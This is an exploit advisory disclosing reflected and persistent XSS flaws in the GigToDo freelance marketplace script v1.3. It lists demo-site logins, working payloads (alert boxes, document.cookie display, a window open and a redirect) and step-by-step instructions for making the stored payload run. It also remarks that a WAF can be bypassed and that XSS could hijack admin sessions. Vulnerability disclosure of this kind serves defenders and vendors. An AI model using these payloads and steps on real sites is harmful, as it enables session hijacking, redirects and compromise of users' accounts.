* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Reflected & Persistent XSS Injections
* # Google Dork: -
* # Date: 2019/07/28
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79
::- Details & Description -::
::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Frontend (auth): https://www.gigtodo.com/login.php
~ Login / Password (buyer/seller) #1: pat / Pat
~ Login / Password (buyer/seller) #2: patricia / Pat
~ Login / Password (buyer/seller) #3: tyrone / Pat
~ Login / Password (buyer/seller) #4: jess / Pat
::- Special Note -::
~ Web-application price is $175, 14 Sales.
~ «Script is fully protected from SQL Injection and XSS.» © Pixinal_Studio (web-app author)
~ «When you purchase the script, as long as you do not share your admin credentials, you are completely protected. Hope this makes sense?» © Pixinal_Studio (web-app author)
~ On the demo website you'll face the Mod_Security WAF which is possible to bypass. There is no guarantee that customers will use some kind of WAF, so entire exploiting process may be much easier. Plus, most of the time users really don't care about security stuff, so passwords for admin area can be brute-forced or admin session can be hijacked by XSS attack vector. At this point, possibility to create an executable .PHP file with users content inside is a huge security breach and time bomb in the design of any web-app.
~ Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. The same if you do not recognize the fact of breaches in the web-app design, putting your ego above the safety of your customers.
::- PoC Links -::
::- PoC [Reflected XSS Injection] -::
~ For reflected XSS injection use the search bar or go to the https://www.gigtodo.com/search page and use payload like one of the listed below.
~ Example #1: <img src='x'+/onerror=(alert)('m0ze')>
~ Example #2: <body +/onload=(alert)('m0ze')>m0ze</body>
~ Example #3: <body +/onload=(alert)(document.cookie)>m0ze</body>
~ Example #4: <svg/onload='window.open(`https://twitter.com/m0ze_ru`);'>
::- PoC [Persistent XSS Injection] -::
~ Register a new account or use one of the provided for the demo website: pat / Pat || patricia / Pat || tyrone / Pat || jess / Pat, log in and go to the https://www.gigtodo.com/proposals/create_proposal page. Vulnerable text area is «Proposal's Description», so paste ur payload inside, fill in other fields and save the data TWICE (if u don't understand it read the «Important Stuff» below).
~ Example #1: <h1 onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is fully protected from SQL Injection and XSS ©`);'><img src='x' onerror=';alert(`For sure lol`);'>
~ Example #2: <h1 onmouseover=';alert(`Greetz from m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`https://twitter.com/m0ze_ru`);'>
::- PoC [Important Stuff] -::
~ Keep in mind that u need to save ur payload inside the «Proposal's Description» text area TWICE or ur payload WILL NOT WORK. So literally paste ur payload inside the «Proposal's Description» text area and scroll down to «Update Proposal» button, press it and ur data will be saved. After that u'll be redirected to https://www.gigtodo.com/proposals/view_proposals.php page. Select ur created proposal and press green square dropdown menu on the right («Actions» column) and click on «Edit» link. After that just don't change anything, scroll down to «Update Proposal» button, press it and ur data will be saved ONE MORE TIME. That's it, now ur payload will work.
~ If u are using any redirects inside payload, then DISABLE JS WHILE U EDIT UR PROPOSAL or u just don't be able to re-save the data. And don't forget that u can use links with ur proposal ID to edit it ( https://www.gigtodo.com/proposals/edit_proposal?proposal_id=XX ).